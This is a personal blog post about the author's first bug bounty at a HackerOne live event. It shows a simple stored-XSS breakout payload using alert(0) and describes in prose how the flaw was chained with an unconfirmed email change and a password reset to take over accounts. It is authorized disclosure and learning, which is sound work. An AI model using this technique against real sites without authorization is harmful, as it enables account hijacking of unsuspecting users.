hon.dev

First bug bounty report

July 30, 2019

Back in August 2018, @nemessisc and I met at a web application security workshop. A few months later we reconnected and she invited me to be her +1 for H1-415, a HackerOne live hacking event!

h1-415 challenge coin

Photo cred: Nemesis

I never really did bug bounty but had some experience with doing pentest-ish type things. Took an amazing security course in college and went to BSides in my hometown. I had also recently worked xsspay, an intentionally vulnerable web app to teach other software engineers at my previous company the basics of XSS.

To shill xsspay for a second, it’s a fake bank sort of app where you have $$$ and can pay/request money from other users. I explained the three major types of XSS in the presentation and then served the project afterwards so the attendees could try to steal money from each other with their own XSS payloads.

Anyways back to the original topic, a bug bounty live hacking event! A little bit of a rundown on how these work:

  • You invited to the event, maybe sign a NDA, and join some slack group.
  • Eventually hop on some scope call video where you learn the targets.
  • Search for bugs before the event and get them in during the presubmission time. During presubmission time, all bugs marked as dupe get a split payout for those that submit it.
  • Go to the event and search for more bugs

So knowing XSS decently well, I decided that was the type of vulnerability I was going to look for. In the scope call, the company revealed a brand new un-bug-bountied asset and I decided to go go over that since I thought it would be less combed over.

With all that in my mind, my less-than-thought-out “plan” was to put payloads EVERYWHERE and see if anything suspicious turns up. Lucky for me, something suspicious did turn up.

In most places where I entered text, it would store the text and then display the same text. Say if I changed my name to <script>alert(0)</script> it would reflect exactly as that in the user interface. However, in one place it didn’t — there was some weird kind of sanitization going on. I inspected the elements to see what was happening in the DOM and changed my payload so that it would escape out. For example:

// DOM
<div>Your text: {your_text}</div>

// PAYLOAD
your_text = </div><script>alert(0)</script><div>

That’s a super contrived example and the actual payload was a little more complicated but it follows the same principle. So now I have stored XSS, nice.

I told @d0nutptr and he offered help with writing the report. His big piece of advice is to demonstrate what kind of impact this bug has and why they should care.

The part that was vulnerable could be both public and private so therefore I could have some arbitrary code execute on another user’s session if another user visits the public part of the site where the payload is waiting. So I poked around in the UI some more and ended up looking into the account settings and password reset flow.

Turns out changing an account email didn’t require a confirmation and password reset only requires account email. I crafted my payload so that when a user visits the vulnerable site, a request is made to change their email to my email. Afterwards I can go through the password reset process — all of a sudden, I own the victim’s account. Extra nice. 😎

In summary, I found stored XSS that could takeover another user’s account given that the user visits the page where the payload is stored.

Submitted the bug…and it was a dupe! Luckily I submitted it during the presubmission period and payout gets split between all the hackers that reported it. The bug itself was worth $500 and that was split between 4 people. Not bad for a first time. 🎉


Hon Kwok
Getting my thoughts in order! 😎
TwitterPersonal Site